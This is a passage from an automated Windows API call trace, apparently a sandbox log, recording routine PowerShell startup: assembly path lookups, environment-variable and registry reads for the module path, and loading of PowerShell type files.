lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", 
nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.311] SetConsoleCtrlHandler (HandlerRoutine=0x28d677c, Add=1) returned 1 [0133.343] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0133.347] CoCreateGuid (in: pguid=0xcdb50 | out: pguid=0xcdb50*(Data1=0xf94cb609, Data2=0xded2, Data3=0x44a5, Data4=([0]=0x98, [1]=0xed, [2]=0x80, [3]=0x16, [4]=0xab, [5]=0x54, [6]=0x73, [7]=0xf7))) returned 0x0 [0133.352] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.352] CoTaskMemFree (pv=0x10ccc0) [0133.611] WinSqmIsOptedIn () returned 0x0 [0133.612] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.612] CoTaskMemFree (pv=0x10ccc0) [0133.619] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.619] CoTaskMemFree (pv=0x10ccc0) [0133.620] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.620] CoTaskMemFree (pv=0x10ccc0) [0133.623] 
CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.623] CoTaskMemFree (pv=0x10ccc0) [0133.625] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.625] CoTaskMemFree (pv=0x10ccc0) [0133.653] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.654] CoTaskMemFree (pv=0x10ccc0) [0133.656] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.656] CoTaskMemFree (pv=0x10ccc0) [0133.658] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.658] CoTaskMemFree (pv=0x10ccc0) [0133.662] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.662] CoTaskMemFree (pv=0x10ccc0) [0133.706] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.706] CoTaskMemFree (pv=0x10ccc0) [0133.713] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.713] CoTaskMemFree (pv=0x10ccc0) [0133.714] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.714] CoTaskMemFree (pv=0x10ccc0) [0134.027] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.105] GetFullPathNameW 
(in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.108] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0134.128] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.128] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0134.128] CoTaskMemFree (pv=0x10ccc0) [0134.134] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.134] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0134.135] CoTaskMemFree (pv=0x1b80ca50) [0134.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6c8 | out: phkResult=0xcd6c8*=0x324) returned 0x0 [0134.135] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd64c, lpData=0x0, lpcbData=0xcd648*=0x0 | out: lpType=0xcd64c*=0x2, lpData=0x0, lpcbData=0xcd648*=0x6c) returned 0x0 [0134.135] CoTaskMemAlloc (cb=0x70) returned 0x1487c0 [0134.135] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd61c, lpData=0x1487c0, lpcbData=0xcd618*=0x6c | out: lpType=0xcd61c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd618*=0x6c) returned 0x0 [0134.135] CoTaskMemFree (pv=0x1487c0) [0134.135] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.135] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0134.135] CoTaskMemFree 
(pv=0x1b80ca50) [0134.136] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.136] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0134.136] CoTaskMemFree (pv=0x1b80ca50) [0134.139] RegCloseKey (hKey=0x324) returned 0x0 [0134.139] CoTaskMemAlloc (cb=0xcc) returned 0x1b80ca50 [0134.139] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80ca50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0134.139] CoTaskMemFree (pv=0x1b80ca50) [0134.139] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6c8 | out: phkResult=0xcd6c8*=0x324) returned 0x0 [0134.139] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd64c, lpData=0x0, lpcbData=0xcd648*=0x0 | out: lpType=0xcd64c*=0x0, lpData=0x0, lpcbData=0xcd648*=0x0) returned 0x2 [0134.139] RegCloseKey (hKey=0x324) returned 0x0 [0134.174] CoTaskMemAlloc (cb=0x20c) returned 0x15bfe0 [0134.174] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x15bfe0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\Documents") returned 0x0 [0134.175] CoTaskMemFree (pv=0x15bfe0) [0134.175] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Documents", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Documents", lpFilePart=0x0) returned 0x21 [0134.176] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aDU0VK IWA5kLS\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0134.187] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: 
lpBuffer="") returned 0x0 [0134.187] CoTaskMemFree (pv=0x10ccc0) [0134.190] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.190] CoTaskMemFree (pv=0x10ccc0) [0134.215] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.215] CoTaskMemFree (pv=0x10ccc0) [0134.215] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.215] CoTaskMemFree (pv=0x10ccc0) [0134.220] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd4b8 | out: phkResult=0xcd4b8*=0x32c) returned 0x0 [0134.224] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd4cc, lpData=0x0, lpcbData=0xcd4c8*=0x0 | out: lpType=0xcd4cc*=0x1, lpData=0x0, lpcbData=0xcd4c8*=0x74) returned 0x0 [0134.225] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd43c, lpData=0x0, lpcbData=0xcd438*=0x0 | out: lpType=0xcd43c*=0x1, lpData=0x0, lpcbData=0xcd438*=0x74) returned 0x0 [0134.225] CoTaskMemAlloc (cb=0x78) returned 0x1487c0 [0134.225] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xcd40c, lpData=0x1487c0, lpcbData=0xcd408*=0x74 | out: lpType=0xcd40c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd408*=0x74) returned 0x0 [0134.225] CoTaskMemFree (pv=0x1487c0) [0134.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a 
[0134.225] SetErrorMode (uMode=0x1) returned 0x1 [0134.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd390 | out: lpFileInformation=0xcd390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0134.225] SetErrorMode (uMode=0x1) returned 0x1 [0134.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.228] SetErrorMode (uMode=0x1) returned 0x1 [0134.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd390 | out: lpFileInformation=0xcd390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0134.229] SetErrorMode (uMode=0x1) returned 0x1 [0134.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.235] SetErrorMode (uMode=0x1) returned 0x1 [0134.235] 
GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd390 | out: lpFileInformation=0xcd390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0134.236] SetErrorMode (uMode=0x1) returned 0x1 [0134.249] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.249] CoTaskMemFree (pv=0x10ccc0) [0134.258] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0134.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.258] CoTaskMemFree (pv=0x10ccc0) [0134.259] GetACP () returned 0x4e4 [0134.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.285] SetErrorMode (uMode=0x1) returned 0x1 [0134.286] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330 [0134.287] GetFileType (hFile=0x330) returned 0x1 [0134.287] SetErrorMode (uMode=0x1) returned 0x1 [0134.287] GetFileType (hFile=0x330) returned 0x1 [0134.289] ReadFile (in: hFile=0x330, 
lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.293] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0xcf3, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3a283, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3a283*, lpNumberOfBytesRead=0xcd2c8*=0x0, lpOverlapped=0x0) returned 1 [0134.294] ReadFile (in: hFile=0x330, lpBuffer=0x2d3ae28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d3ae28*, lpNumberOfBytesRead=0xcd2c8*=0x0, lpOverlapped=0x0) returned 1 [0134.297] CloseHandle (hObject=0x330) returned 1 [0134.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.302] SetErrorMode (uMode=0x1) returned 0x1 [0134.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd240 | out: 
lpFileInformation=0xcd240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0134.303] SetErrorMode (uMode=0x1) returned 0x1 [0134.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.305] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", 